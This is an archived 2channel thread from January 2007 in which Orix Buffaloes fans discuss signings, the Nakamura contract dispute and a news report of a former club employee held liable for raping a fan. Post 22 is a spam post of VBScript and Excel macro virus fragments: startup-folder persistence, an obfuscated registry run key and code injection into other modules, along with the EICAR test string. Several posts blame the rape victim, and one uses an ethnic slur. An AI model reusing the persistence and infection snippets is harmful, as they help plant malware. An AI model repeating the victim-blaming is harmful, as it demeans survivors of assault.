2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【Bs】オリックス・バファローズ134【SKY】

1 :淳子 ◆atsukoAlaU :2007/01/20(土) 01:05:59 ID:1d0Ldn460
☆前スレ
【Bs】オリックス・バファローズ133【SKY】
http://ex13.2ch.net/test/read.cgi/base/1168669637/

※書き込みはメール欄に半角で『sage』と入力を推奨、基本的に『sage』進行でお願いします。※
※罵倒・挑発・中傷や、蔑称を含む差別・攻撃的な書き込みは厳禁です! 他者を不快にさせないように!※
※オリックス・バファローズ(Bs)に関係のない話題は控えましょう!※
※批判だけでなく改善策も述べましょう! 建設的でない批判は荒らしと同様です。※
※固定ハンドルネーム(コテハン)での書き込みは、スレッドが荒れる原因にもなるのでご遠慮ください。※
※荒らし・煽りの書き込みは、徹底『無視・放置』しましょう! 相手にするほど増長します。※

☆リンク集などのテンプレは、>>2-15のあたりにあります。
☆利点いろいろ、2ch専用ブラウザ(無料)の使用をおすすめします。
http://www.monazilla.org/
☆実況はこちらでお願いします。(プロ野球板での実況は『禁止』されています)
【野球実況板】
http://live22x.2ch.net/livebase/
【Bs実況板】
http://maru.s28.xrea.com/bbs/bs/
☆次スレは>>950を踏んだ方が立ててください。(立てられない場合は他の方に依頼してください)

2 :淳子 ◆atsukoAlaU :2007/01/20(土) 01:07:17 ID:1d0Ldn460
☆★Bsスレの基本方針★☆
・他者を不快にさせない書き込みをしましょう。そして、他球団と他球団のファンを尊重しましょう。
・少しでも荒らしを避けるために、書き込みの際はメール欄に半角で『sage』入力を推奨します。
・目立つが故に批判されやすく、スレが荒れる原因にもなるため、コテハンでの書き込みはご遠慮ください。
☆★荒らし対策は『無視・放置』が一番。相手にするのは時間の無駄!★☆
・荒らしをする人はかわいそうな人ですので、その存在を心の中で哀れみつつ、完全『無視・放置』しましょう。
・荒らしの書き込みには、一切レスをしないでください。徹底的に『無視・放置』で対応してください。
・アンチBsスレ&レスを見つけた方は、削除の依頼をお願いします。
☆★2ch専用ブラウザ(無料)のススメ★☆
・2ch専用ブラウザを使えば、不快なレスの削除が自由自在にできます。NGワード機能もありますよ!
・サーバの負荷を軽減。『人大杉』規制中も、普通にスレの読み書きができます。
・スレがdat落ち後でも、既得分の過去ログが読めます。とにかく(・∀・)オススメ!
☆★実況は実況板で!★☆
・試合実況は、サーバに負担がかかるので『禁止』されています。実況板でどうぞ!

・次スレを立てられない時は、『スレ立て代行依頼スレッド』も活用してください。


3 :淳子 ◆atsukoAlaU :2007/01/20(土) 01:07:51 ID:1d0Ldn460
△▼Bsスレお役立ちリンク集▼△

☆球団&球場関連サイト
・チェックプレーヤーズ:(試合の途中経過・結果と戦評、監督・選手の談話)
http://www.buffaloes.co.jp/check_players/index.asp
・スタジアムガイド(スカイマークスタジアム・京セラドーム大阪)
http://www.buffaloes.co.jp/stadium/index.asp
・サーパス(オリックス2軍) 公式サイト
http://www.buffaloes.co.jp/surpass/index.asp
・パシフィック野球連盟公式ホームページ:(予告先発、一軍出場選手登録・抹消など)
http://www.pacific.npb.or.jp/index.html
・日本野球機構オフィシャルサイト
http://www.npb.or.jp/
・京セラドーム大阪
http://www.kyoceradome-osaka.jp/
・Yahoo!天気情報:野球場の天気
http://weather.yahoo.co.jp/weather/jp/leisure/baseball/
・Bsブログ:(「Players Diary」、「(スカイマーク球場長の)閑話球題」、「キャラバンカー」の3種類)
http://www.buffaloes.co.jp/blog/index.asp


4 :淳子 ◆atsukoAlaU :2007/01/20(土) 01:08:22 ID:1d0Ldn460
選手登場曲集1
後藤光尊
http://www.superclips.nl/videoclip/7760/Xzibit/Mutha_Mutha.htm
水口栄二
http://youtube.com/watch?v=Pl8M8ZBME5U
歌藤達夫
http://youtube.com/watch?v=cC43eUDyD3w
吉井理人
http://youtube.com/watch?v=gw0rIoWRmZY
吉川勝成
http://youtube.com/watch?v=HQ08S47F1CQ
的山哲也
http://www.amazon.co.jp/o/ASIN/B000056MS7/ の1曲目
相川良太
http://www.sonymusic.co.jp/Music/Arch/KS/Pushim/sound/list1.html のSoldier
迎祐一郎
http://www.amazon.com/gp/product/B00005B69Z/  の3曲目
金子千尋タン
http://youtube.com/watch?v=tx-x-EMR9ds


5 :淳子 ◆atsukoAlaU :2007/01/20(土) 01:09:01 ID:1d0Ldn460
選手登場曲集2
菊地原毅
http://www.mh-friends.com/shop/index.cgi?No=1038
本柳和也
http://www.134r.com/news/20060308single/index0306.html
村松有人
http://www.themods.jp/multimedia/movie_twopunks.html
中山慎也
http://www.youtube.com/watch?v=lxuWcupBMfM
日高剛(スカイマークスタジアム)
http://www.youtube.com/watch?v=siSNJ07D8uU
山本省吾
http://www.youtube.com/watch?v=3BD3FfclfE4
平野佳寿
http://www.youtube.com/watch?v=SYPDjo-eUEM
阿部真宏(京セラたこ焼きドーム)
http://www.youtube.com/watch?v=WV4Pjfhl_V
萩原淳(京セラたこ焼きドーム)
http://youtube.com/watch?v=yHiW5KTLY08
香月良太
http://www.youtube.com/watch?v=IgnHEmz5vaw&search=girls%20fight




6 :淳子 ◆atsukoAlaU :2007/01/20(土) 01:09:39 ID:1d0Ldn460
☆選手公式サイト&ブログ
・川越英隆
http://www.kawagoe11.net/
・山口和男
http://ballplayers.jp/yamaguchi/
・吉井理人
http://ballplayers.jp/yoshii/
・ユウキ
http://ballplayers.jp/yuki/
・吉川勝成
http://www.99katsu.com/
・辻 俊哉
http://www.kaito-tsuji.net/
・Bsブログ:「Players Diary」 (北川、平野恵、加藤のうちから1選手)
http://www.buffaloes.co.jp/blog/diary/index.asp

☆選手公認サイト(選手本人から寄せられたコメントを読むことができるサイトです)
・村松有人:「ベース泥棒 村松有人」
http://www.arihito.com/

7 :淳子 ◆atsukoAlaU :2007/01/20(土) 01:10:17 ID:1d0Ldn460
☆スポーツ新聞系 情報サイト
・大阪日刊:オリックス・バファローズ
http://osaka.nikkansports.com/baseball/professional/buffaloes/top-buffaloes.html
・スポニチ大阪:「まるごとオリックス」
http://www.sponichi.co.jp/osaka/spe1/orix.html
・サンスポ:オリックス・バファローズ
http://www.sanspo.com/baseball/buffaloes/buffaloes.html
・Yahoo!ニュース:オリックス・バファローズ
http://dailynews.yahoo.co.jp/fc/sports/orix_buffaloes/

■ アンチBsスレ&レスの削除依頼先 ■

base:プロ野球[スレッド削除]
http://qb5.2ch.net/test/read.cgi/saku/1152171608/
base:プロ野球[レス削除]
http://qb5.2ch.net/test/read.cgi/saku/1159450957/

ご協力よろしくお願いします

8 :淳子 ◆atsukoAlaU :2007/01/20(土) 01:10:54 ID:1d0Ldn460
1.中継ぎ・抑えが打たれても泣かない
2.チャンスでよしくんの打席はもうこない
3.ノリのことは忘れる(思い出にしまっておく)
4.助っ人外人に期待しない(特に打者)
5.暗黒采::::::::::::::::::::::::: : : : : : : : : : : :. . . . . .. . . . . . . . .
6.スカイマークスタジアムと京セラドーム大阪を比べない
7.後藤の対左投手は笑って許す
8.清原の空振り三振もご愛敬
9.スカスタで雨に濡れてもめげない
10.球団の営業努力を広い心で受け止める
11.親会社の悪口に釣られない
12.人気球団を妬まない
13.ベテランの栄二さんを見守ろう
14.病み上がりの選手を温かく見守る
15.後藤の評価を素直に見守る

9 :代打名無し@実況は実況板で:2007/01/20(土) 01:29:07 ID:CMuStCUF0
めっちゃ巨乳
めっちゃ巨乳

10 :代打名無し@実況は実況板で:2007/01/20(土) 01:33:10 ID:j771ekLnO
おっさん乙

11 :代打名無し@実況は実況板で:2007/01/20(土) 01:34:44 ID:ZC1gmwoN0
超GJ

12 :代打名無し@実況は実況板で:2007/01/20(土) 01:36:15 ID:AJf9JbsZ0
           _,.: -=- .,_
        ,r '"-= -.,、 ミ ` :., 
       ,i"       ヽ, ミ ヾ.ヽ, 
       i          ヽ ミミi
      l ` 、         ヽ ミ i
     _,.-"=-.,_、 _,,. _      i ミ i
     i l'~t・ヽ`i i"=,,-、`_ _,..-=-i_,/、
     ヾ.,_ ~,. / .i `"~ ヽ'-'"~ r'",  i
     .i  r'  ` -=-'"    ソ,. '     _______________
     .i  `  ' ヽ` -、  y_,. '     / 古田党、マンセルそして基地外(ふみ)
      i -'= - .,_. ,     ヘ、     <  糞コテばかりのオリスレで淳子はまともだよ 
    ,/"i,  .:::.'   、  _,.-'"i i`、_     \スレ立てもしてくれて 淳子にアッパレやってくれ
 _,..-'" l `-= _,. -='"  /;  i ヽ ̄~`=- _  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
r" i'  l  ::::::.`-., ::::::::..  /;  i  ヽ  ~ヽ `-.,_
  i   ヘ  ::::..ヾ  ヽ、.  /;   .ii   j `、


13 :代打名無し@実況は実況板で:2007/01/20(土) 01:39:22 ID:+zBYsJ99O
櫻井、桜田さん乙。

14 :代打名無し@実況は実況板で:2007/01/20(土) 01:40:27 ID:dumlJpnh0
>>1-8
乙々

15 :代打名無し@実況は実況板で:2007/01/20(土) 01:42:38 ID:ue3n+6I40
今日大正に行く用事があったから、ふらっと京セラに寄ってきた。
壁や階段にはまだノリがプリントされてた。切ないね。

16 :代打名無し@実況は実況板で:2007/01/20(土) 02:27:56 ID:9OfD3NXKO
ぜんぜん

17 :青波 ◆5555568822 :2007/01/20(土) 02:38:30 ID:Fjj8ABJo0
久しぶりー★ あと一人新外国人獲るみたいだけど、勿論シルバーラだね?!

18 :代打名無し@実況は実況板で:2007/01/20(土) 02:41:22 ID:3jAhmkox0
近鉄の主要駅にオリックスバファローズの看板広告が出てるけど、しっかりとノリさんの写真も
載ってるね・・・

19 :代打名無し@実況は実況板で:2007/01/20(土) 07:19:47 ID:5icy57HJO
>>1
乙です 最後の助っ人はロドリゲス希望!!

20 :代打名無し@実況は実況板で:2007/01/20(土) 07:44:14 ID:cPismALE0
今年も普通に5位だろう

21 :代打名無し@実況は実況板で:2007/01/20(土) 08:02:10 ID:Zi73EPBlO
>>1&テンプレ乙


22 :代打名無し@実況は実況板で:2007/01/20(土) 08:36:40 ID:FzZQ0dUF0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

23 :代打名無し@実況は実況板で:2007/01/20(土) 08:55:10 ID:LpsYMOmS0
   巛彡彡ミミミミミ彡彡
  巛巛巛巛巛巛巛彡彡
  |:::::::           i  
  |::::::::    ⌒   ⌒ |
  |:::::    -・=- , (-・=-       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  | (6    ⌒ ) ・ ・)( ^ヽ   /
  | |.     ┏━━┓ |  <  自分見つめなおせ
  ∧ |      ┃ヽ三ノ ┃ |   \
/\\ヽ     ┗━┛ ノ     \________
/  \ \ヽ.  ─── /|\     ノ7_,,, 、
    (⌒、"⌒ソ⌒ヽ- イノ  `、  ( ィ⌒ -'"",う
    ~''(_)(_)(_)(_)ソ-ィ     ヽノ   ,イ^
  _ヽ /`、_, ィ/   ヽ      ヽ─/
/,ィ'"/     /    `、     ) /
         /B u f f a l o e s  i
ttp://osaka.nikkansports.com/baseball/professional/buffaloes/p-ob-tp0-20070119-144358.html

24 :代打名無し@実況は実況板で:2007/01/20(土) 09:25:46 ID:25QI5Hly0
ついに平野にも見捨てられたか・・・

>ただ、自由契約となった中村が「平野恵の助けにならんかった」と謝ったことには
>「言葉はうれしかったが、自分の契約とは全く別」と、そっけなかった。

http://www.sponichi.co.jp/osaka/spe1/200701/20/spe1201774.html



25 :代打名無し@実況は実況板で:2007/01/20(土) 09:45:10 ID:Xca7FNA80
128 :名無しさん@恐縮です :2007/01/18(木) 19:26:53 ID:gZXas8If0
東スポ1面抜粋

前川、中東から持ち込まれた盗難車ベンツを後輩に高額で売りつける

ベンツ購入を考えていた後輩選手に「知人から安く買える」と前川が話を持ちかけた。
総額1000万円近くを後輩選手は払ったが、数回乗っただけで故障。
正規ディーラーに修理に出したところ、ボディーとエンジンの型番が全く違ったことが判明。
しかも、車体にはアラビア文字らしき文字が刻まれており、トランクからは
砂漠の砂のようなさらサラの砂が出てきた。
そのため、選手間からは「中東から持ち込まれた盗難車じゃないか」と話題になったという。
チームメートは前川に問い詰めたが、前川本人は「知らない」の一点張り。
結局、そのまま泣き寝入りしたという。






なにこの犯罪スレwwwwwwwwwwwwwwwwwwwwwwwww 潰れちまえよwwwwwwwwwwwwwwwwwwwwwwwwwwwww

26 :代打名無し@実況は実況板で:2007/01/20(土) 09:48:01 ID:ZC1gmwoN0
>>25
前川wwww
闇の密輸者かよwwww

27 :代打名無し@実況は実況板で:2007/01/20(土) 09:49:24 ID:5icy57HJO
>>24
平野言うねぇwww

28 :代打名無し@実況は実況板で:2007/01/20(土) 09:51:11 ID:Zmhn5nan0
>>24
豚哀れwwwwwwwwwwwwww

29 :代打名無し@実況は実況板で:2007/01/20(土) 09:58:39 ID:wfxMaMWd0
>>25
とりあえず東スポと夕刊フジはどうでもいい

30 :代打名無し@実況は実況板で:2007/01/20(土) 10:02:29 ID:uEU8DEDLO
ていうかオリックス球団の野球協約違反に近い行為はなぜ問われないのかな?

31 :代打名無し@実況は実況板で:2007/01/20(土) 10:03:03 ID:ZC1gmwoN0
Bsが前YSラロッカら今季の“外国人5選手”を発表
http://www.sponichi.co.jp/osaka/spe1/200701/20/spe1201772.html

全員1年契約らしいな、あと一人はやっぱり外野の長距離砲を獲るらしいな
J−ROD来るか??

32 :代打名無し@実況は実況板で:2007/01/20(土) 10:05:14 ID:Nwy7BtTuO
オリックス球団 ヤバくねぇ!? 方向性が見えねぇな!

33 :代打名無し@実況は実況板で:2007/01/20(土) 10:05:16 ID:25QI5Hly0
>>30
>今回の中村の場合は「限度額を超えることについては合意していた」(阪神・野崎球団取締役)とし、
>年俸ではなく公傷制度を巡って決裂したため、球団側に協約違反等はないと強調。
>宮本会長も「お互いの事実関係が食い違っていたので、もう少し調査したい」と話した。

http://hochi.yomiuri.co.jp/baseball/npb/news/20070120-OHT1T00072.htm



34 :代打名無し@実況は実況板で:2007/01/20(土) 10:09:29 ID:5icy57HJO
方向性?膿を出して助っ人補強しただけじゃん どの球団でもやるだろ

35 :代打名無し@実況は実況板で:2007/01/20(土) 10:20:02 ID:Nwy7BtTuO
補強!? それで ラロッカ? なんで ズレータを獲りにいかなかった!?

36 :代打名無し@実況は実況板で:2007/01/20(土) 10:21:28 ID:Xca7FNA80
セラフィニはどうしたんだよ(笑) 最近のオリックスは巨人よりつまらんぞ

37 :代打名無し@実況は実況板で:2007/01/20(土) 10:21:53 ID:A+flprZCO
もう一人は誰だろね。
候補絞ってるってさ。

http://osaka.nikkansports.com/baseball/professional/buffaloes/p-ob-tp0-20070120-144815.html

38 :代打名無し@実況は実況板で:2007/01/20(土) 10:22:55 ID:3F4j2rSTO
去年までは中村が監督だよね?今年は山田?

39 :代打名無し@実況は実況板で:2007/01/20(土) 10:23:39 ID:4eGB+Ntc0
>>30
協約やら契約やらを自分の都合いいように解釈して
相手に呑ませることに関しては天下一品。
選手会やモギタテがかなう相手ではない。

40 :代打名無し@実況は実況板で:2007/01/20(土) 10:25:28 ID:sQ5aso3l0
ところでオリックスファンって本当に存在するの?
今まで会ったことない。

41 :代打名無し@実況は実況板で:2007/01/20(土) 10:27:09 ID:CwgKsnq3O
>>35
年俸が高い
素行が悪い

42 :代打名無し@実況は実況板で:2007/01/20(土) 10:27:55 ID:kjrmpyaL0
ttp://osaka.nikkansports.com/baseball/professional/buffaloes/p-ob-tp0-20070120-144813.html

結局、どのような形にしようと文句言う奴は言ってくる…ということだな。

43 :代打名無し@実況は実況板で:2007/01/20(土) 10:28:03 ID:Nwy7BtTuO
1番 人気ないんじゃないかな

44 :ふみ:2007/01/20(土) 10:28:15 ID:e1rcyF+qO
眠ったままの化石…金子投手・岸田投手・中山投手。眠らされたままの宝石…平野佳寿投手。眠りに就いた肉体…ノリ。千年前に突然変異をした奇跡…歌藤投手(AB型)

45 :ふみ:2007/01/20(土) 10:32:55 ID:e1rcyF+qO
ノリは、毎年ごねています。やっぱり皆、不愉快だと思ってるんや!あの人、ベテランなのに、チームイベントに出ず、素行悪かったようだね。前川同様、性格が思いっきり顔に染み付いてない?

46 :代打名無し@実況は実況板で:2007/01/20(土) 10:34:45 ID:A+flprZCO
まぁラロッカは対パでかなり打ってるしね。
たまたまその時に調子良かっただけかもしれんけど。

47 :代打名無し@実況は実況板で:2007/01/20(土) 10:36:18 ID:ZC1gmwoN0
>>37
>「ノー・モア・JP」

なんかワロタw

48 :ふみ:2007/01/20(土) 10:36:53 ID:e1rcyF+qO
前川投手が、車詐欺した件。ルートから薬とかやっていたのでは?ヤクザと繋がりもあったり。被害者も、若いから、騙せたんだよ。『若いのは、舐められるでイカン』

49 :代打名無し@実況は実況板で:2007/01/20(土) 10:38:13 ID:fUdIbUo50
>>39
ただでさえ合併で元近鉄選手の居場所を奪った上、
安年俸で買い叩いた行為は、地上げに近いものがあるな。

50 :代打名無し@実況は実況板で:2007/01/20(土) 10:53:21 ID:U9a4EKX0O
>39
都合の良いように?
今回オリックス側が何か理不尽な行為したのか?

51 :代打名無し@実況は実況板で:2007/01/20(土) 10:57:56 ID:A+flprZCO
>>50
選手会は反論されてから、ずいぶんおとなしくなっちゃったなw


http://osaka.nikkansports.com/baseball/professional/buffaloes/p-ob-tp0-20070120-144808.html

52 :代打名無し@実況は実況板で:2007/01/20(土) 11:01:18 ID:m03M+tzl0
選手会もノリの移籍先探してやりゃいいのに
使えねーな

53 :代打名無し@実況は実況板で:2007/01/20(土) 11:10:06 ID:fUdIbUo50
どうやらこのスレは、オリのフロントの工作員がいるようですな。

54 :代打名無し@実況は実況板で:2007/01/20(土) 11:20:47 ID:/56sbIGDO
じゃあ野球板も芸スポも工作員だらけだなw

55 :代打名無し@実況は実況板で:2007/01/20(土) 11:38:25 ID:QtWyLjRP0
都合の悪いことを言われると工作員のせい(笑)

56 :代打名無し@実況は実況板で:2007/01/20(土) 11:46:56 ID:LfsUjHYk0
<20日付の「神戸新聞」のスクープです>
女性ファンに乱暴 オリックス元球団社員に損賠命
http://www.kobe-np.co.jp/kobenews/sg/0000220027.shtml

57 :代打名無し@実況は実況板で:2007/01/20(土) 11:48:46 ID:VILcJOUm0
平野は大物だな
勘違い度は海苔と同レベルw

58 :代打名無し@実況は実況板で:2007/01/20(土) 12:06:41 ID:dumlJpnh0
>>31
左右にはこだわりませんって、左必須じゃなかったのかよ
外野で左は良い選手が取れそうに無いって事か・・・

59 :代打名無し@実況は実況板で:2007/01/20(土) 12:30:43 ID:rLMDTS5O0
おいおい、今度はレイプだってな
ほんと球界の足を引っ張るのだけは頑張るな
プロ野球全体のイメージ下げられて迷惑してんだよ
こんな球団を応援する奴の神経を疑うわ

60 :代打名無し@実況は実況板で:2007/01/20(土) 12:30:55 ID:y12RCoeB0
もうニール呼び戻すしかないな

61 :代打名無し@実況は実況板で:2007/01/20(土) 12:31:57 ID:9xwHqgPV0
>>56
この球団、もはや何でもアリだな
プロ野球界をわざと崩壊させようとしているようにしか思えん。

62 :代打名無し@実況は実況板で:2007/01/20(土) 12:36:32 ID:fUdIbUo50
オリフロントも、叩いたらホコリがバシバシ出てきそうやな。

ノリ問題では、2chでこそノリ叩きが激しくてオリの肩持つ奴が多いけど、
こういう問題が出てきたら、オリの方もどうなるかわからんな。

63 :代打名無し@実況は実況板で:2007/01/20(土) 12:38:39 ID:n8cSgIQT0
金欠ヲタウザー

64 :アンチ野球には三国人の方も居るみたいですね:2007/01/20(土) 12:52:20 ID:YLZexWIw0
http://stick.newsplus.jp/id.cgi?bbs=mnewsplus&word=FjUo9HpT0

【音楽】金正日総書記、小沢征爾氏に北朝鮮国立交響楽団の指揮者を要請、断られる[01/17][1件]

287 : 名前:名無しさん@恐縮です E-mail: 投稿日:2007/01/18(木) 05:23:34 ID:FjUo9HpT0
正日は日本国は嫌いかもしれんが
人は好きなはず、製品も

       
          ↓   そして、今日は・・・

http://stick.newsplus.jp/id.cgi?bbs=mnewsplus&word=ZOcb6bmm0

          
          ↓    途中でID変えちゃうよ

http://stick.newsplus.jp/id.cgi?bbs=mnewsplus&word=KwR31UrQ0

普段ならサッカー煽りに対して、野球プギャーレスの筈が何故か・・・
俺が後でIDを検索することを意識してか、やたら日本LOVEを強調するw
他のスレとの論調の違いに注目w

448 名前:名無しさん@恐縮です[] 投稿日:2007/01/20(土) 08:39:50 ID:KwR31UrQ0
>>444

現実生活では黙ってるけど
こういうところでは心の中で思ってること言えるからね
俺は韓国 北朝鮮に負けるのは絶対いやだ
ワールドカップとU17アジアカップで勝ったときはうれしかった


あ   や   し    い   ね   w

65 :代打名無し@実況は実況板で:2007/01/20(土) 12:56:30 ID:4eGB+Ntc0
http://www.kobe-np.co.jp/kobenews/sg/0000220027.shtml

プロ野球オリックス球団の男性契約社員が二〇〇四年六月、
親子観戦チケットの勧誘キャンペーンに協力したファンの
女性をホテルに連れ込んで乱暴し、民事裁判で二百四十五万円の
損害賠償を命じる判決を受けていたことが十九日までに分かった。
(中略)
主婦は「言葉にし難い精神的苦痛を受け、試合も楽しめなくなった。
社員の業務の中で受けた被害なのに、かかわりを避けている球団の
姿勢は納得できない」と話している。
---------------------------
無免許ひき逃げ、薬物使用にレイプ・・・
もういい加減にしてくれ。

66 :代打名無し@実況は実況板で:2007/01/20(土) 12:59:10 ID:ooBaNZYK0
つーかほんとアレだなこの球団終わってるなw
合併騒ぎの時にオリファン辞めて鷹ヲタに転向して大正解だったなwww

67 :代打名無し@実況は実況板で:2007/01/20(土) 13:08:00 ID:VILcJOUm0
シーズンオフだけ主役の球団だな

68 :代打名無し@実況は実況板で:2007/01/20(土) 13:20:36 ID:wNlPDQtI0
だれか前スレ埋めろよ・・・・

69 :代打名無し@実況は実況板で:2007/01/20(土) 13:22:33 ID:pImS1bo7O
はやく身売りしろ

70 :代打名無し@実況は実況板で:2007/01/20(土) 13:58:20 ID:ZPs2LHcm0
まだファン続けるおまえらはお人よしもいいところだな。
こんなところに金落とす気によくなれるな。

71 :代打名無し@実況は実況板で:2007/01/20(土) 14:21:08 ID:SEXo0nPl0
>>65
ID:4eGB+Ntc0
ID:4eGB+Ntc0
ID:4eGB+Ntc0
ID:4eGB+Ntc0
なんなのお前

72 :代打名無し@実況は実況板で:2007/01/20(土) 14:37:32 ID:+D1pmP2G0
217 名前:名刺は切らしておりまして :2007/01/20(土) 14:30:46 ID:9/bkj0OT0
選手が選手なら、社員は下半身で攻めている。

http://www.kobe-np.co.jp/kobenews/sg/0000220027.shtml

プロ野球オリックス球団の男性契約社員が二〇〇四年六月、
親子観戦チケットの勧誘キャンペーンに協力したファンの
女性をホテルに連れ込んで乱暴し、民事裁判で二百四十五万円の
損害賠償を命じる判決を受けていたことが十九日までに分かった。
(中略)
主婦は「言葉にし難い精神的苦痛を受け、試合も楽しめなくなった。
社員の業務の中で受けた被害なのに、かかわりを避けている球団の
姿勢は納得できない」と話している


おいおい、大阪神様の基地外ファンとやらが可愛く見えるな。
人間じゃねえぞ、このダニは。

73 :代打名無し@実況は実況板で:2007/01/20(土) 14:38:37 ID:w+VhF3mA0
>>71
IDがすごいよw

74 :代打名無し@実況は実況板で:2007/01/20(土) 15:11:26 ID:hjgkfG83O
勇者ノリ誕生へ
オリックス・バファローズを自由契約となった中村紀洋内野手(33)が、世界を救う旅へ出発することが20日明らかになった。職業は勇者。
勇者ノリは「まずはホイミを覚えたい」と意気込んでいる。

http://2sen.dip.jp:81/cgi-bin/up/source/up3805.jpg


75 :代打名無し@実況は実況板で:2007/01/20(土) 15:20:12 ID:wzKYnGKB0
球団事務所とかならともかく、ホテルまで行く主婦もどうなのよ、
って気がするのは俺だけですか?大体どこのホテルなのよ?オリエンタル?

76 :代打名無し@実況は実況板で:2007/01/20(土) 15:29:54 ID:fUdIbUo50
>>72
2004年6月ってちょうど合併騒動で揺れていた時期じゃないかこれ。
いったい何をやってるんだよ。

77 :代打名無し@実況は実況板で:2007/01/20(土) 15:31:24 ID:9UWH1XaE0
んでも勧誘販売のチケットを渡すから部屋に来てくれだからな
ソースじゃホテルに無理矢理連れ出し、だし

78 :代打名無し@実況は実況板で:2007/01/20(土) 15:32:38 ID:lMOq6/WH0
女性ファンに乱暴! オリックス元球団社員に損賠命令!

2007/01/20
 プロ野球オリックス球団の男性契約社員が二〇〇四年六月、親子観戦チケットの勧誘キャンペーンに協力した
ファンの女性をホテルに連れ込んで乱暴し、〇六年五月、民事裁判で二百四十五万円の損害賠償を命じる
判決を受けていたことが十九日までに分かった。オリックス球団はすでにこの社員を解雇している。

 神戸地裁明石支部の判決などによると、元社員は兵庫県警を退職後に再就職した元警察官の六十代男性で、
オリックス選手の合宿所やスタジアムの警備を担当していた。

 元社員は〇一年ごろから、選手を見ようと合宿所を訪れていたファンの三十代主婦に、選手を引き合わせたり、
チケットや非売品グッズなどを無償で提供したりするようになった。

 〇四年五月、元社員は主婦に夏休み親子観戦チケットの勧誘販売を依頼。
翌六月、主婦にチケットを引き渡す際、無理やりホテルに連れ込み、乱暴したという。
主婦は球団を通して強く抗議したが、元社員は事実を否定した。

 また、当初は「チケット販売中の事案」として、球団が事実確認などの調査にあたったが、
「本人が否定している以上、これ以上追及できない」と途中から態度を保留。事実関係が確認されないまま、
〇五年三月末に元社員を解雇した。

 主婦は元社員を相手取って提訴。〇六年六月、被害の事実を認め、元社員に慰謝料などを支払うよう命じる判決が確定した。
同年八月、元社員は主婦に謝罪したが、球団からの連絡はなかった。

 主婦は「言葉にし難い精神的苦痛を受け、試合も楽しめなくなった。
社員の業務の中で受けた被害なのに、かかわりを避けている球団の姿勢は納得できない」と話している。

 オリックス球団広報室は「元社員がこのような事件を起こしたことは誠に遺憾に思います。
当時球団として、被害者の方へは誠意を持って対応させていただきました」とコメントした。

http://www.kobe-np.co.jp/kobenews/sg/0000220027.shtml

79 :代打名無し@実況は実況板で:2007/01/20(土) 15:41:27 ID:Zmhn5nan0
犯罪球団いい加減にしろよ
こいつら海苔豚以下のやろう共だな

80 :代打名無し@実況は実況板で:2007/01/20(土) 15:46:21 ID:fUdIbUo50
この件はさすがに海苔豚や前川の件と違って、近鉄に責任転嫁はできんな。

81 :代打名無し@実況は実況板で:2007/01/20(土) 15:46:31 ID:CNLE1Gi10
ID変わってるけど私ね
相手60代じゃんww
普通はホテル行ったからってどうなるとも思わないだろう
主婦が不倫をばれたから騒いでるだけってのは通じないぜ

82 :代打名無し@実況は実況板で:2007/01/20(土) 15:49:50 ID:n3JmfWbvO
女性ファンに乱暴! オリックス元球団社員に損賠命令!

2007/01/20
 プロ野球オリックス球団の男性契約社員が二〇〇四年六月、親子観戦チケットの勧誘キャンペーンに協力した
ファンの女性をホテルに連れ込んで乱暴し、〇六年五月、民事裁判で二百四十五万円の損害賠償を命じる
判決を受けていたことが十九日までに分かった。オリックス球団はすでにこの社員を解雇している。

 神戸地裁明石支部の判決などによると、元社員は兵庫県警を退職後に再就職した元警察官の六十代男性で、
オリックス選手の合宿所やスタジアムの警備を担当していた。

 元社員は〇一年ごろから、選手を見ようと合宿所を訪れていたファンの三十代主婦に、選手を引き合わせたり、
チケットや非売品グッズなどを無償で提供したりするようになった。

 〇四年五月、元社員は主婦に夏休み親子観戦チケットの勧誘販売を依頼。
翌六月、主婦にチケットを引き渡す際、無理やりホテルに連れ込み、乱暴したという。
主婦は球団を通して強く抗議したが、元社員は事実を否定した。

 また、当初は「チケット販売中の事案」として、球団が事実確認などの調査にあたったが、
「本人が否定している以上、これ以上追及できない」と途中から態度を保留。事実関係が確認されないまま、
〇五年三月末に元社員を解雇した。

 主婦は元社員を相手取って提訴。〇六年六月、被害の事実を認め、元社員に慰謝料などを支払うよう命じる判決が確定した。
同年八月、元社員は主婦に謝罪したが、球団からの連絡はなかった。

 主婦は「言葉にし難い精神的苦痛を受け、試合も楽しめなくなった。
社員の業務の中で受けた被害なのに、かかわりを避けている球団の姿勢は納得できない」と話している。

 オリックス球団広報室は「元社員がこのような事件を起こしたことは誠に遺憾に思います。
当時球団として、被害者の方へは誠意を持って対応させていただきました」とコメントした。

http://www.kobe-np.co.jp/kobenews/sg/0000220027.shtml

83 :オ古田党 ◆qnGYRPDR52 :2007/01/20(土) 15:53:04 ID:WQWH1ZFkO
>>2コテはんでの書き込みは辞めてください。

淳子・・・・・

84 :代打名無し@実況は実況板で :2007/01/20(土) 15:55:56 ID:U75Gx7+20
その記事を生で見たが社会面、4コママンガの右隣で「北海道ガス漏れ」の
次に大きかった。「球団側の調査不十分」の見出しが痛いな。
被害者の関係者が加害者の謝罪があったものの、球団の連絡が無く、
前川問題が出たので怒りを殺せずに明らかにしたんだろうね。
